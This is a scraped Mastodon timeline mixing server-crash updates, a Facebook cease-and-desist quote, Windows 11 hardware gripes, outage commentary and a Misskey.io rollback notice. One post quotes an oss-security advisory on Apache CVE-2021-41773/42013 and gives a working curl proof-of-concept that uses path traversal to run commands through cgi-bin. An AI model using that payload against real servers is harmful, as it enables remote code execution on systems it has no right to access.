Show newer

#Guppe users, the server won't restart.

Silver lining for the clean slate: development has been paralyzed because I need to upgrade it to the new activitypub back end I wrote, activitypub-express, but I've been putting it off because it would require writing a difficult database migration to preserve the existing groups

Show thread

@mdhughes @galaxis well the server crashed for only the second time in two years, but now mongodb won't start

"[...] Facebook sent me a cease-and-desist letter. The company demanded that I take down the tool. It also told me that it had permanently disabled my Facebook account ... Pointing to a provision in its terms of service that purports to bind even former users of Facebook, Facebook also demanded that I never again create a tool that interacts with Facebook or its many other services in any way."

jwz.org/blog/2021/10/unfollow-

(Note: No need to share that you deleted your account, sport. So did I.)

ROFL!

Subject: [oss-security] CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.

Show thread

Ah, that over there was the CVE-2021-41773 Apache httpd 2.4.49 with mod-cgi PoC a couple of days ago: mobile.twitter.com/hackerfanta

curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
(Slightly optimized version from down that :birdsite: thread.)

Sure been a long time since I saw one of those 🙄

I should probably be glad that Microsoft is locking out basically all my current hardware from Windows 11. Even the Ryzen box bought in 2018 doesn't have a TPM, and the notebook is so old it doesn't even have EFI.
Probably just the kind of nudge I need to stop being lazy with everything.

Not quite sure why Vivaldi on Linux immediately closes on Ctrl+q, even though "show exit confirmation dialog" is ticked in the settings...

Second time this hit me this week when I missed Ctrl+w (close tab) right next to it.

Yeah, I know, not a novel problem... No idea why it's coming up for me right now.

Lots of people are asking me how I make these drawings.

I begin by coding the 3d environment by hand in Moogle, I then export a bit map of the wireframe, I then open it in Noodle and clean up the lines.

Moogle: wiki.xxiivv.com/site/moogle.ht
Bit Maps: wiki.xxiivv.com/site/chr_forma
wiki.xxiivv.com/site/noodle.ht

Morgen ist wieder #MatchingMittwoch. Bis Ende des Jahres werden an jedem 1. Mittwoch des Monats alle Einzelspenden von #betterplaceOrg mit 10% verstärkt! Wir freuen uns sehr, wenn ihr uns mit eurer #Spende unterstützt.

betterplace.org/de/organisatio

Looks like my small corner of the Fediverse has seen some more activity than usual during the Facebook outage yesterday - there's a noticeable spike in my processed toots - graph...

Here is your regular reminder that text messages (SMS) are neither private nor secure. This company handles billions of messages, yet it only managed to detect a hack after five years and doesn’t bother to disclose the scope of the breach. (Via @evacide@twitter.com)

vice.com/en/article/z3xpm8/com

CloudFlare blog as a good write-up:
blog.cloudflare.com/october-20

(reminder, CloudFlare is part of the problem, not of the solution)

Show thread

...while you can't (yet) log back in, you can read their peering automation block post from a couple of months back: engineering.fb.com/2021/05/20/

Show thread

announcement
As a result of a critical system failure on October 3rd of 2021, Misskey.io's has been rolled back to a backup made on April 4th of 2021.

In accordance with this, all account data has also been reset to the state it was in at the point this backup was made. We are greatly sorry for the inconvenience, but would like to ask users of remote instances that have followed users from Misskey.io between the above stated timespan to please cancel and re-follow the users that they have followed, as while it may seem like you are following them, this is not being correctly reflected.

Additionally, we would be happy if you could please spread the news of this post to as many people as you are able to.

Once again, we sincerely apologize for the great trouble caused by this incident and ask for both understanding and cooperation in this matter.

RE:
https://misskey.io/notes/8rgl4waclb

Show older
INFRa Mastodon

The social network of the future: No ads, no corporate surveillance, ethical design, and decentralization! Own your data with Mastodon!